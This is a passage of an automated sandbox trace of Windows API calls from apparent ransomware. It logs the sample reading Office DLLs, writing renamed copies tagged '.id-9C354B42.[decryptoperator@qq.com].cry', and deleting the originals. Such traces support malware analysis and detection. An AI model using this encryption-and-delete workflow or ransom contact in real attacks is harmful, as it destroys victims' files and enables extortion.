(lpString=".ppt") returned 4 [0053.468] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.469] lstrlenW (lpString=".zip") returned 4 [0053.469] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.469] lstrlenW (lpString=".rar") returned 4 [0053.469] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.469] lstrlenW (lpString=".bz2") returned 4 [0053.469] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.469] lstrlenW (lpString=".7z") returned 3 [0053.469] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.469] lstrlenW (lpString=".dbf") returned 4 [0053.469] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.469] lstrlenW (lpString=".1cd") returned 4 [0053.469] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.469] lstrlenW (lpString=".jpg") returned 4 [0053.469] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.469] lstrlenW (lpString=".doc") returned 4 [0053.469] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.469] lstrlenW (lpString=".docx") returned 5 [0053.469] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.469] lstrlenW (lpString=".pdf") returned 4 [0053.469] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.469] lstrlenW (lpString=".xls") returned 4 [0053.469] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.469] lstrlenW (lpString=".xlsx") returned 5 [0053.469] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.469] lstrlenW (lpString=".ppt") returned 4 [0053.469] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.469] lstrlenW (lpString=".zip") returned 4 [0053.469] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.469] lstrlenW (lpString=".rar") returned 4 [0053.470] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.470] lstrlenW (lpString=".bz2") returned 4 [0053.470] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.470] lstrlenW (lpString=".7z") returned 3 [0053.470] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.470] lstrlenW (lpString=".dbf") returned 4 [0053.470] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.470] lstrlenW (lpString=".1cd") returned 4 [0053.470] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0053.470] lstrlenW (lpString=".jpg") returned 4 [0053.470] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.470] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.470] lstrlenW (lpString="ACEDAO.DLL") returned 10 [0053.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.470] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=744888) returned 1 [0053.471] CloseHandle (hObject=0x1c4) returned 1 [0053.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll")) returned 0x20 [0053.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.471] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.471] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.471] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.471] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.471] GetLastError () returned 0x0 [0053.471] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0xb5db8, lpOverlapped=0x0) returned 1 [0053.728] WriteFile (in: hFile=0x21c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xb5dc0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xb5dc0, lpOverlapped=0x0) returned 1 [0053.752] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.752] WriteFile (in: hFile=0x21c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0053.752] SetEndOfFile (hFile=0x21c) returned 1 [0053.752] CloseHandle (hObject=0x21c) returned 1 [0053.752] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.752] SetEndOfFile (hFile=0x1c4) returned 1 [0053.757] CloseHandle (hObject=0x1c4) returned 1 [0053.758] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.760] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll")) returned 1 [0053.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.775] lstrlenW (lpString=".doc") returned 4 [0053.775] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.775] lstrlenW (lpString=".docx") returned 5 [0053.776] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0053.776] lstrlenW (lpString=".pdf") returned 4 [0053.776] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.776] lstrlenW (lpString=".xls") returned 4 [0053.776] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.776] lstrlenW (lpString=".xlsx") returned 5 [0053.776] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0053.776] lstrlenW (lpString=".ppt") returned 4 [0053.776] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.776] lstrlenW (lpString=".zip") returned 4 [0053.776] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.776] lstrlenW (lpString=".rar") returned 4 [0053.776] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.776] lstrlenW (lpString=".bz2") returned 4 [0053.776] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.776] lstrlenW (lpString=".7z") returned 3 [0053.776] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.776] lstrlenW (lpString=".dbf") returned 4 [0053.776] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.776] lstrlenW (lpString=".1cd") returned 4 [0053.776] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.776] lstrlenW (lpString=".jpg") returned 4 [0053.776] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.776] lstrlenW (lpString=".doc") returned 4 [0053.776] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.777] lstrlenW (lpString=".docx") returned 5 [0053.777] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0053.777] lstrlenW (lpString=".pdf") returned 4 [0053.777] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.777] lstrlenW (lpString=".xls") returned 4 [0053.777] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.777] lstrlenW (lpString=".xlsx") returned 5 [0053.777] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0053.777] lstrlenW (lpString=".ppt") returned 4 [0053.777] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.777] lstrlenW (lpString=".zip") returned 4 [0053.777] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.777] lstrlenW (lpString=".rar") returned 4 [0053.777] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.777] lstrlenW (lpString=".bz2") returned 4 [0053.777] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.777] lstrlenW (lpString=".7z") returned 3 [0053.777] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.777] lstrlenW (lpString=".dbf") returned 4 [0053.777] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.777] lstrlenW (lpString=".1cd") returned 4 [0053.777] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0053.777] lstrlenW (lpString=".jpg") returned 4 [0053.777] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.779] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.779] lstrlenW (lpString="ACEEXCH.DLL") returned 11 [0053.779] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.779] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=442272) returned 1 [0053.779] CloseHandle (hObject=0x220) returned 1 [0053.779] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll")) returned 0x20 [0053.779] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.780] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.780] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.780] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.780] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0053.780] GetLastError () returned 0x0 [0053.780] ReadFile (in: hFile=0x220, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x6bfa0, lpOverlapped=0x0) returned 1 [0053.818] WriteFile (in: hFile=0x1f4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x6bfb0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x6bfb0, lpOverlapped=0x0) returned 1 [0053.826] ReadFile (in: hFile=0x220, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.826] WriteFile (in: hFile=0x1f4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xea, lpOverlapped=0x0) returned 1 [0053.827] SetEndOfFile (hFile=0x1f4) returned 1 [0053.827] CloseHandle (hObject=0x1f4) returned 1 [0053.827] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.827] SetEndOfFile (hFile=0x220) returned 1 [0053.831] CloseHandle (hObject=0x220) returned 1 [0053.831] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.831] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll")) returned 1 [0053.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.832] lstrlenW (lpString=".doc") returned 4 [0053.832] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.832] lstrlenW (lpString=".docx") returned 5 [0053.832] lstrcmpiW (lpString1=".docx", lpString2="H.DLL") returned -1 [0053.832] lstrlenW (lpString=".pdf") returned 4 [0053.832] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.832] lstrlenW (lpString=".xls") returned 4 [0053.832] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.832] lstrlenW (lpString=".xlsx") returned 5 [0053.832] lstrcmpiW (lpString1=".xlsx", lpString2="H.DLL") returned -1 [0053.832] lstrlenW (lpString=".ppt") returned 4 [0053.832] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.832] lstrlenW (lpString=".zip") returned 4 [0053.832] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.832] lstrlenW (lpString=".rar") returned 4 [0053.832] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.832] lstrlenW (lpString=".bz2") returned 4 [0053.832] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.832] lstrlenW (lpString=".7z") returned 3 [0053.832] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.832] lstrlenW (lpString=".dbf") returned 4 [0053.832] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.832] lstrlenW (lpString=".1cd") returned 4 [0053.832] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.833] lstrlenW (lpString=".jpg") returned 4 [0053.833] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.833] lstrlenW (lpString=".doc") returned 4 [0053.833] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.833] lstrlenW (lpString=".docx") returned 5 [0053.833] lstrcmpiW (lpString1=".docx", lpString2="H.DLL") returned -1 [0053.833] lstrlenW (lpString=".pdf") returned 4 [0053.833] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.833] lstrlenW (lpString=".xls") returned 4 [0053.833] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.833] lstrlenW (lpString=".xlsx") returned 5 [0053.833] lstrcmpiW (lpString1=".xlsx", lpString2="H.DLL") returned -1 [0053.833] lstrlenW (lpString=".ppt") returned 4 [0053.833] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.833] lstrlenW (lpString=".zip") returned 4 [0053.833] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.833] lstrlenW (lpString=".rar") returned 4 [0053.833] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.833] lstrlenW (lpString=".bz2") returned 4 [0053.833] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.833] lstrlenW (lpString=".7z") returned 3 [0053.833] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.833] lstrlenW (lpString=".dbf") returned 4 [0053.833] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.833] lstrlenW (lpString=".1cd") returned 4 [0053.833] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 67 [0053.833] lstrlenW (lpString=".jpg") returned 4 [0053.833] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.834] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.834] lstrlenW (lpString="ACEODBC.DLL") returned 11 [0053.834] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.834] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=342960) returned 1 [0053.834] CloseHandle (hObject=0x220) returned 1 [0053.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll")) returned 0x20 [0053.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.834] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.834] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.834] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0053.835] GetLastError () returned 0x0 [0053.835] ReadFile (in: hFile=0x220, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x53bb0, lpOverlapped=0x0) returned 1 [0054.036] WriteFile (in: hFile=0x1f4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x53bc0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x53bc0, lpOverlapped=0x0) returned 1 [0054.041] ReadFile (in: hFile=0x220, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.041] WriteFile (in: hFile=0x1f4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.042] SetEndOfFile (hFile=0x1f4) returned 1 [0054.042] CloseHandle (hObject=0x1f4) returned 1 [0054.042] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.042] SetEndOfFile (hFile=0x220) returned 1 [0054.045] CloseHandle (hObject=0x220) returned 1 [0054.045] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.045] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll")) returned 1 [0054.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.046] lstrlenW (lpString=".doc") returned 4 [0054.046] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.046] lstrlenW (lpString=".docx") returned 5 [0054.046] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0054.046] lstrlenW (lpString=".pdf") returned 4 [0054.046] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.046] lstrlenW (lpString=".xls") returned 4 [0054.046] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.046] lstrlenW (lpString=".xlsx") returned 5 [0054.046] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0054.046] lstrlenW (lpString=".ppt") returned 4 [0054.046] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.046] lstrlenW (lpString=".zip") returned 4 [0054.046] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.046] lstrlenW (lpString=".rar") returned 4 [0054.046] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.046] lstrlenW (lpString=".bz2") returned 4 [0054.046] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.046] lstrlenW (lpString=".7z") returned 3 [0054.046] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.046] lstrlenW (lpString="C:\\Program 